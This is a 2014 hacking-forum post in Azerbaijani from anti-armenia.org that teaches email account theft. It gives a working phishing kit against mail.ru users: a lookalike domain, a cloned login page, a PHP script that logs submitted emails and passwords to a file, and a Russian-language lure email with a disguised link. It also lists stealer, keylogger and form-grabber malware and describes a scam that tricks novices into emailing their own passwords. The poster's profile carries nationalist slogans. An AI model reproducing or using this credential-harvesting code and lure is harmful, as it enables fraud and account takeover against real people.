Istifadəçi |
2014-10-27 08:47 GMT |
|
|
|
Security |
|
Mesaj Sayı : 839 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 25 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : Sumqayıt |
Ölkə : |
Məslək : Pan - Turkism |
Yaş : 34 |
Mesaj : |
|
Çox saylı muraciətləri nəzərə alaraq bu mövzu haqqında bilgilərimlə istərdim ki, sizlərlə paylaşım
Indiki zamanda e-mail hack demək olar ki, aktuallığını itirmir
Mövzü aktual olana kimi onun müxtəlif həll yollarıda olacaq
Asağıda mən ən aktual yollar haqqında danışacam
1) Malware
Yəni hər hansısa troyan vasitəsilə e-mail şifrəsinin ogurlanması
Bunun üçün ən çox istifadə olunan troyan növləri bunlardır
stealer - brauzerdə və yaxud e-mail klient proqramlarında saxlanılmış şifrələri "oğurlayır"
keylogger - klavişdə daxil edilən məlumatları və bufer-dəki məlumatları oğurlayır
form grabber - pc-də oturandan sonra userın web səhifələrdə və soft larda daxıl etdiyi məlumatları (login , şifrə və s.) oğurlayır.
Bu cür troyan tipi indi ən aktualdır , ona görə ki o ancaq yaddasda saxlanılmış şifrələri deyil həmdə user tərəfindən əl ilə hər dəfə daxil edilən şifrələri də ogurlayır.
Bir nov keylogger kimi ancaq onu keyloggerdən üstün edən cəhhəti odur ki, o lazımsız klavişdən gələn məlumatları oğurlamır ancaq form-a daxil edilən məlumatları. bu na görə
bu cur troyanlar public-də demək olar ki mövcud deyil
2)Bruteforce
Bu növ haqq hamıya məlum olan və o qədər də effektiv olmayan hack üsüludur
Bu haqda uzun danışmayacam sadəcə qısa olaraq deyim ki bu proqram qabaqcadan hazırlanmış şıfrə variantlarını bir-bir yoxlayır
bu cür hack şifələrini 123123 qwerty kimi qoyan userləri hacklamaq üçün nəzərdə tutulur
Onun effektivliyini azaldan bir səbəbdə odur ki, müasir zamanda bütün mail servislərində brut əleyhinə müdafiə sistemləri olur
3) Phishing (https://en.wikipedia.org/wiki/Phishing)
Bu üsül müasir zamanda ən aktual e-mail hack üsüludur
Bu üsülla təkcə e-mail şifrələrni deyil müxtəlif bankların userlərinin kredit kart məlumatlarının oğurlanması üçün geniş istifadə edilir
Yuxarıdakı üslullardan fərqli olaraq bu üsül hər hansısa bir qabaqcadan nəzərdə tutulmuş userin məlumatlarının oğurlanması üçün istifadə olunur (yuxarıda qeyd edilən üsullar
hər hansısa bir userin deyil loru dildə desək "kim düşdü düşdü" onun maəlumatlarını oğurlamaq üçün nəzərdə tutulur)
Bu üsül haqqındada uzun danışmayacağam.
Misal üçün biz mail.ru -da yerləşən userin mailini oğurlamağa çalışaq (test@mail.ru)
Bizə mail.ru a oxşayan bir domain (misal üçün mail-login.ru) və bu domain yerləşdirmək üçün hostig lazımdır
Domain və hosting alandan sonra domain üçün e subdomain-i açırıq yəni e.mail-login.ru
Sonra bizə mail.ru-nun html səhifəsi lazimdır
Onu burdan götürürük https://e.mail.ru/login
Səhifəni index.php kimi save edirik , sonra notepad vasitəsilə faylın html kodunu açırıq
Kodda bu kodu axtarış veririk <form id="LoginExternal" method="post" action="https://auth.mail.ru/cgi-bin/auth" name="Auth">
Oradakı https://auth.mail.ru/cgi-bin/auth userin daxil elədiyi login və şifrənin hara göndəriləcəyi ünvandır
Daxil olunan məlumatlar həmin ünvana göndərilir və orda yoxlanılır , əgər daxil edilən məlumatlar düzdürsə user öz e-mail-nə yönəldilir
Biz bu ünvanı log.php-yə dəyişirik <form id="LoginExternal" method="post" action="log.php" name="Auth">
index.php save edirik
Sonra biz log.php faylı yaradırıq və ora bu kodu əlavə edirik
Kod: <?PHP
$Login = $_POST['Login'];
$Password = $_POST['Password'];
$Domain = $_POST['Domain'];
$log = fopen("log.txt","a+");
fwrite($log,"\n Email:$Login@$Domain Sifre:$Password \n");
fclose($log);
header ("https://e.mail.ru/messages/inbox");
?>
user log və passı daxil edib enteri bassa log və pass siz öz saytıvızda yerləşdirəcəyiviz log.php e gedecek
bu scriptdə log və passı serverdəki log.txt falına yazıb useri
https://e.mail.ru/messages/inbox saytına redirect edecek
index.php və log.php fayllarını aldığımız hostingə public_html qovluğuna upload edirik və hər iki fayla 777 hüququ veririk
bizim fayl http://e.mail-login.ru/index.php ünvanında yerləşəcək
Sonra biz userin e-mail-nə göndərəcəyimiz "fake" adlanan html formasında məktub tərtib edməliyik
Kod: Ваш профиль будет заблокирован, в связи с жалобой поступившей к администрации 27.10.2014. <br><br>
Согласно пункту 13.3 пользовательского соглашения, Mail.Ru оставляет за собой право временно приостановить либо прекратить предоставление услуг Mail.Ru,
своевременно уведомив об этом пользователя.<br><br>
Для того чтобы опровергнуть заявление Вам нужно подтвердить что вы не являетесь спам ботом. <br><br>
Для подтверждение пройдите по ссылке: <a
href="http://e.mail-login.ru/index.php?spam?unblocked=2008474861215660">http://e.mail.ru/index.php?spam?unblocked=2008474861215660</a><br><br>
Если заявка не будет отклонена в течении 2 дней, ваш почтовый аккуант будет заблокирован. Ей присвоен номер 2008474861215660. сылке: <a
href="http://e.mail-login.ru/index.php?spam?unblocked=2008474861215660">http://e.mail.ru/index.php?spam?unblocked=2008474861215660</a><br><br>
Если заявка не будет отклонена в течении 2 дней, ваш почтовый аккуант будет заблокирован. Ей присвоен номер 2008474861215660.[/code]
Məktubda yazılıb ki guya user-in e-maildən mail.ru adminlərinə şikayət gəlib spam göndərdiyinə görə və user gərək ki, sübut etsin ki o spam bot yox insandır
ona görə yerləşdirlimiş linkə keçid etsin
Məktubda link http://e.mail.ru/index.php?spam?unblocked=2008474861215660 kimi görsənir
amma əslimdə link http://e.mail-login.ru/index.php?spam?unblocked=2008474861215660 dir (yuxarıdakı index.php-nin yerləşdiyi ünvan)
Bu məktubu html formatında php script vasitəsilə göndəririk userin -mail-nə ( php sender -> https://anti-armenia.org/forums.php?m=posts&q=2108 )
Və gözləyik ki, user məktubu açsın və link-ə keçid edərək log və passını daxil etsin
Yuxarıda qey etdiyim üsüllardan əlavə bir üsülda var ki, ona SM yəni sosial mühəndislik deyilir
İndi bu üsül o qədər də aktual deyil amma 6-8 il bunda qabaq runetdə ən geniş yayılan üsul aşağıdakı idi
biz mail.ru nun admin e-mail-ə oxşayan bir e-mail açırıq misal üçün admin-servis@mail.ru
sonra lamerlər üçün nəzərdə tutulan hack forumlarında belə bir elan yerləşdiririk
"Mən mail-da istənilən insanın mailinin şifrəsini restore etməyin yolunu öyrənmişəm
Mail.ru-nun serverində restore bölməsindəki bug vasitəsilə istənilən e-mailin şifrəsini öyrənmək olar
bunu üçün bizə bu kod lazımdır
[code]Read in the strings.
my $restore_account = "lazımolanmail@mail.ru";
my $sender = "mənimmailin@mail.ru";
my $password = "şifrə";
while(my $line = <STDIN>) {
chomp $line;
if($line eq "STOP!") { last; }
$accum = "$accum$sep$line";
if(--$num == 0) { last; }
$sep = " ";
}[/code]
bu kodda lazımolanmail@mail.ru yerinə sındırmaq lazım olan mail qeyd edirik
mənimmailin@mail.ru bu bölməyə kodu göndərdiyiviz və şifrənin hara göndəriləcəyi mail-i qeyd edirik
şifrə: bura həmin mailin şifərini qey edirik , bu bizə authorized üçün lazımdır
Kodu göndəririk admin-servis@mail.ru mailinə və bir neçə dəqiqədən sonra mailə şifrə göndərilir"
Bunulada lamer özü öz şifrəsini bizə yollayır ))))
Əslində bu kod perl control constructs kodunda bir hissə dir amma lamer üçün bu bir dəhşətli hack kodudur))
Yuxarıda qeyd edilmiş üsüllar ancaq informasiya məqsədi ilə yazılmışdır
Kimə sə yetirilmiş ziyana görə mən cavabdehlik daşımıram
Bura Ergenekon, təpədən-dırnağa Türkəm!
|
Anti-armenia.ORG |
|
Istifadəçi |
2014-10-27 19:29 GMT |
|
|
|
Designer |
|
Mesaj Sayı : 1007 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 109 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : Baki |
Ölkə : |
Məslək : 💻 |
Yaş : |
Mesaj : |
|
|
Anti-armenia.ORG |
|
Istifadəçi |
2014-11-01 22:06 GMT |
|
|
|
Pr0grammer |
|
Mesaj Sayı : 1677 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 62 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : KARABAKH IS AZERBAIJAN! |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
|
Anti-armenia.ORG |
|